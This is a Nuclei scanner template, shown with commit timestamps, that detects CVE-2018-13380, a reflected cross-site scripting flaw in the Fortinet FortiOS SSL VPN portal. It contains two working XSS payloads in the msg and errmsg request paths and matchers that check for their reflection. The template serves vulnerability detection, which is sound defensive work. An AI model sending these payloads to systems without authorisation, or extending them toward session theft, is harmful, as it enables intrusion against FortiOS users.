nuclei-templates/http/cves/2018/CVE-2018-13380.yaml

56 lines
2.2 KiB
YAML
Raw Normal View History

2021-01-02 05:00:39 +00:00
id: CVE-2018-13380
2020-11-24 14:30:18 +00:00
info:
name: Fortinet FortiOS - Cross-Site Scripting
author: shelld3v,AaronChen0
2020-11-24 14:30:18 +00:00
severity: medium
description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation: |
Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.
reference:
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
- https://fortiguard.com/advisory/FG-IR-18-383
- https://fortiguard.com/advisory/FG-IR-20-230
- https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://github.com/merlinepedra25/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-13380
cwe-id: CWE-79
epss-score: 0.00122
epss-percentile: 0.46406
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: fortinet
product: fortios
tags: cve,cve2018,fortios,xss,fortinet
2020-11-24 14:30:18 +00:00
http:
2020-11-24 14:30:18 +00:00
- method: GET
path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
2021-06-29 02:17:42 +00:00
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
2020-11-24 20:00:01 +00:00
matchers-condition: and
2020-11-24 14:30:18 +00:00
matchers:
- type: word
part: body
2020-11-24 14:30:18 +00:00
words:
- "<svg/onload=alert(1337)>"
- "<script>alert(1337)</script>"
condition: or
2020-11-24 20:00:01 +00:00
- type: word
part: header
2023-07-11 19:49:27 +00:00
negative: true
2020-11-24 20:00:01 +00:00
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950